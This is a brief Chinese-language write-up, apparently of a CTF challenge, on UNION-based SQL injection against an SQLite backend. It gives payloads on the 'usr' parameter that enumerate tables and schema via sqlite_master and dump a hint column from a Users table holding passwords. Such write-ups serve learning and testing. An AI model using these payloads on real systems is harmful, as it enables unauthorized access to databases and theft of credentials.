用order by 判断表有两列,换掉admin并union select 1,2可以看到cookie值变为+2,
那就不用盲注了。sqlite没有concat但有group_concat……害
1 2 3 4 5 6
查表名: usr=0' union select 1,(select tbl_name from sqlite_master where type='table')-- 查列名: usr=0' union select 1,(select sql from sqlite_master where type='table')-- 查数据: usr=0' union select 1,(select group_concat(hint) from Users)--
结果:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
sql: CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))